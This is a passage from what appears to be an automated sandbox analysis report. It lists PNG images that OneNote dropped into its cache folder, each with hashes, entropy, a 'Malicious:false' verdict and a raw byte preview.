                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000028.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000029.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002A.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002B.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002C.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002D.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002E.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002F.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002G.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002H.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002I.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002J.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
